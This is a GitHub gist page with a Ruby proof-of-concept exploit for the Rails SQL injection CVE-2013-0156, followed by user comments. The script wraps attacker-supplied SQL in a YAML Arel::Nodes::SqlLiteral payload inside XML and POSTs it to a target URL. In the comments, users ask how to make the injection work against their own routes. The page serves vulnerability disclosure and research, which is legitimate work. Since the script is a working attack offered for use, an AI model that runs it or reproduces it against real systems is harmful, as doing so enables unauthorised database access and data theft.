Last active

Embed URL

HTTPS clone URL

SSH clone URL

You can clone with HTTPS or SSH.

Download Gist

Proof-of-Concept exploit for Rails SQL Injection (CVE-2013-0156)

View rails_sqli.rb
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails SQL Injection (CVE-2013-0156)
#
# ## Advisory
#
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
#
# ## Caveats
#
# * Only find_by_*() methods that are passed params are vulnerable.
#
# ## Synopsis
#
# $ rails_sqli.rb URL PARAM SQL
#
# ## Dependencies
#
# $ gem install ronin-support
#
# ## Example
#
# $ rails_sqli.rb http://localhost:3000/secrets/search secret
#
# ### config/routes.rb
#
# resources :secrets do
# collection do
# post :search
# end
# end
#
# ### app/controllers/secrets_controller.rb
#
# def search
# @secret = secret.find_by_secret(params[:secret])
#
# render :json => @secret
# end
#
# ## License
#
# Copyright (c) 2013 Postmodern
#
# This exploit is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This exploit is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this exploit. If not, see <http://www.gnu.org/licenses/>.
#
# ## Shoutz
#
# drraid, cd, px, sanitybit, sysfail, trent, dbcooper, goldy, coderman, letch,
# starik, toby, jlt, HockeyInJune, cloud, zek, natron, amesc, postmodern,
# mephux, nullthreat, evoltech, flatline, r0bglesson, @ericmonti, @bascule,
# @charliesome, @homakov, @envygeek, @chendo, @bitsweat (for creating the vuln),
# @tenderlove (for fixing it), Fun Town Auto, garbage pail kids, hipsters,
# the old Jolly Inn, Irvin Santiago, that heavy metal dude who always bummed
# cigarettes off us, SophSec crew and affiliates.
#
 
require 'ronin/network/http'
require 'ronin/formatting/html'
require 'ronin/ui/output'
 
include Ronin::Network::HTTP
include Ronin::UI::Output::Helpers
 
unless ARGV.length == 3
$stderr.puts "usage: #{$0} URL PARAM SQL"
exit -1
end
 
url = ARGV[0]
param = ARGV[1]
sql = ARGV[2]
 
yaml = "--- !ruby/string:Arel::Nodes::SqlLiteral #{sql.dump}"
 
xml = %{
<?xml version="1.0" encoding="UTF-8"?>
<#{param} type="yaml">#{yaml.html_escape}</#{param}>
}.strip
 
print_info "POSTing SQLi to #{url} ..."
 
response = http_post(
:url => url,
:headers => {
:content_type => 'text/xml',
:x_http_method_override => 'get'
},
:body => xml
)
 
print_debug "Received #{response.code} response"
 
case response.code
when '200' then print_info "Success!"
when '404' then print_error "Not found"
when '500' then print_error "Error!"
end

Can you tell me how do you use Arel::Nodes::SqlLiteral to attack find_by_secret? Thanks

Add a comma at the end of line 96.

Owner

@mephux newb mistake. thanks for catching that.

Owner

@bachue checkout the lengthy write up. Basically Arel::Nodes::SqlLiteral represents raw SQL that is dumped into the resulting SQL expression.

@postmodern could you give an example please? I found that whatever SQL I passed, was being treated as the value for the param, in this case secret => OR NULL. I was unable to interpolate quotation marks as these were being stripped out and kept running into 'column does not exist' errors?

My example worked on a /posts/search route acting on @posts = Post.find_by_name(params[:name]). Therefore, I need to pass a string + extra SQL I wish to inject. Thoughts?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.